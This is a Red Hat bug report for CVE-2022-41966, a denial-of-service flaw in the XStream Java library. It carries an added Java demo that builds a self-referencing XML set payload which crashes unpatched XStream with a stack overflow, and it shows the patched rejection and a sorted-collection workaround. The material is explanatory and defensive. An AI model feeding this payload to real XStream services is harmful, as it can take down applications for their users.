Bug 2170431 (CVE-2022-41966) - CVE-2022-41966 xstream: Denial of Service by injecting recursive collections or maps based on element's hash values raising a stack overflow
Summary: CVE-2022-41966 xstream: Denial of Service by injecting recursive collections ...
Alias: CVE-2022-41966
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
Depends On: 2170626 2170627 2170744
Blocks: 2170432
Reported: 2023-02-16 11:11 UTC by TEJ RATHI
Modified: 2023-03-16 13:29 UTC (History)

Fixed In Version: xstream 1.4.20
Doc Type: If docs needed, set a value
Doc Text:
A flaw was found in the xstream package. This flaw allows an attacker to cause a denial of service by injecting recursive collections or maps, raising a stack overflow.
Clone Of:
Last Closed: 2023-03-16 13:29:37 UTC


System                  ID              Private  Priority  Status  Summary  Last Updated
Red Hat Product Errata  RHSA-2023:1006  0        None      None    None     2023-03-08 14:55:28 UTC
Red Hat Product Errata  RHSA-2023:1177  0        None      None    None     2023-03-09 10:47:10 UTC
Red Hat Product Errata  RHSA-2023:1286  0        None      None    None     2023-03-16 09:31:31 UTC

Description TEJ RATHI 2023-02-16 11:11:59 UTC
XStream serializes Java objects to XML and back again. Versions prior to 1.4.20 may allow a remote attacker to terminate the application with a stack overflow error, resulting in a denial of service only via manipulation of the processed input stream. The attack uses the hash code implementation for collections and maps to force recursive hash calculation causing a stack overflow. This issue is patched in version 1.4.20 which handles the stack overflow and raises an InputManipulationException instead. A potential workaround for users who only use HashMap or HashSet and whose XML refers to these only as default map or set, is to change the default implementation of java.util.Map and java.util per the code example in the referenced advisory. However, this implies that your application does not care about the implementation of the map and all elements are comparable.
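
The mechanism described above, as an added example that is not part of this report, the advisory, or the XStream project. It shows (1) with plain JDK collections why a HashSet that contains itself can be built but cannot be hashed again, (2) the same shape fed to XStream, where an unpatched version lets the StackOverflowError escape from fromXML and 1.4.20 rejects the input instead, and (3) the advisory's workaround for older versions. The XML payload is constructed here and is not the advisory's; it relies on the default `set` alias resolving to XStream's default Set implementation and on an XPath-relative `reference` back to the parent element. TreeMap and TreeSet are assumed as the sorted replacement implementations (the reason the workaround requires comparable elements). Requires the xstream artifact on the classpath.

```java
import java.util.HashSet;
import java.util.Map;
import java.util.Set;
import java.util.TreeMap;
import java.util.TreeSet;

import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.InputManipulationException;

public class RecursiveHashDemo {

    // Constructed payload (assumption, not the advisory's): the innermost <set> is an
    // XPath-relative reference to its parent, so the middle set ends up containing
    // itself, and the outer set then has to hash it.
    static final String PAYLOAD =
          "<set>\n"
        + "  <set>\n"
        + "    <set reference=\"..\"/>\n"
        + "  </set>\n"
        + "</set>";

    // The mechanism with JDK collections only. Inserting the set into itself succeeds
    // because it is still empty when hashed (AbstractSet.hashCode() of {} is 0).
    // Hashing it afterwards sums the hash of its one element, which is itself.
    static String hashOfSelfContainingSet() {
        Set<Object> inner = new HashSet<>();
        inner.add(inner);
        try {
            Set<Object> outer = new HashSet<>();
            outer.add(inner);            // inner.hashCode() -> inner.hashCode() -> ...
            return "added, hash=" + outer.hashCode();
        } catch (StackOverflowError e) {
            return "StackOverflowError";
        }
    }

    // What the application sees. The default security framework allows the Collection
    // and Map hierarchies, so a type whitelist alone does not stop this input.
    static String deserialise(XStream xstream, String xml) {
        try {
            Object o = xstream.fromXML(xml);
            return "ok: " + o.getClass().getName();
        } catch (InputManipulationException e) {
            // XStream 1.4.20 and later: the overflow is caught inside XStream and
            // reported as manipulated input.
            return "rejected: " + e.getMessage();
        } catch (StackOverflowError e) {
            // XStream before 1.4.20: the error escapes fromXML and, if not caught
            // by the caller, terminates the handling thread or the application.
            return "StackOverflowError: unpatched XStream";
        } catch (RuntimeException e) {
            return "failed: " + e.getClass().getSimpleName();
        }
    }

    // Workaround for versions before 1.4.20 (assumes TreeMap/TreeSet as the sorted
    // replacements). Sorted collections compare elements instead of hashing them, so
    // a <set> element that references its own parent fails during conversion
    // (a Set is not Comparable) rather than recursing in hashCode().
    static XStream withSortedDefaults() {
        XStream xstream = new XStream();
        xstream.addDefaultImplementation(TreeMap.class, Map.class);
        xstream.addDefaultImplementation(TreeSet.class, Set.class);
        return xstream;
    }

    public static void main(String[] args) {
        System.out.println(hashOfSelfContainingSet());
        System.out.println(deserialise(new XStream(), PAYLOAD));
        System.out.println(deserialise(withSortedDefaults(), PAYLOAD));
    }
}
```

The workaround changes the concrete classes every `<map>` and `<set>` in the input is materialised into, so it is only safe when the application does not depend on HashMap/HashSet semantics and every key or element it ever deserialises implements Comparable; otherwise legitimate input fails in the same place the payload does. Upgrading to 1.4.20 is the fix; the workaround is for deployments that cannot yet upgrade.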


Comment 1 Anten Skrabec 2023-02-16 20:16:42 UTC
Created xstream tracking bugs for this issue:

Affects: epel-all [bug 2170627]
Affects: fedora-all [bug 2170626]

Comment 10 errata-xmlrpc 2023-03-08 14:55:23 UTC
This issue has been addressed in the following products:

  Red Hat build of Quarkus 2.7.7

Via RHSA-2023:1006 https://access.redhat.com/errata/RHSA-2023:1006

Comment 11 errata-xmlrpc 2023-03-09 10:47:06 UTC
This issue has been addressed in the following products:

  RHINT Camel-Q 2.7-1

Via RHSA-2023:1177 https://access.redhat.com/errata/RHSA-2023:1177

Comment 13 errata-xmlrpc 2023-03-16 09:31:28 UTC
This issue has been addressed in the following products:

  Migration Toolkit for Runtimes 1 on RHEL 8

Via RHSA-2023:1286 https://access.redhat.com/errata/RHSA-2023:1286

Comment 14 Product Security DevOps Team 2023-03-16 13:29:32 UTC
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

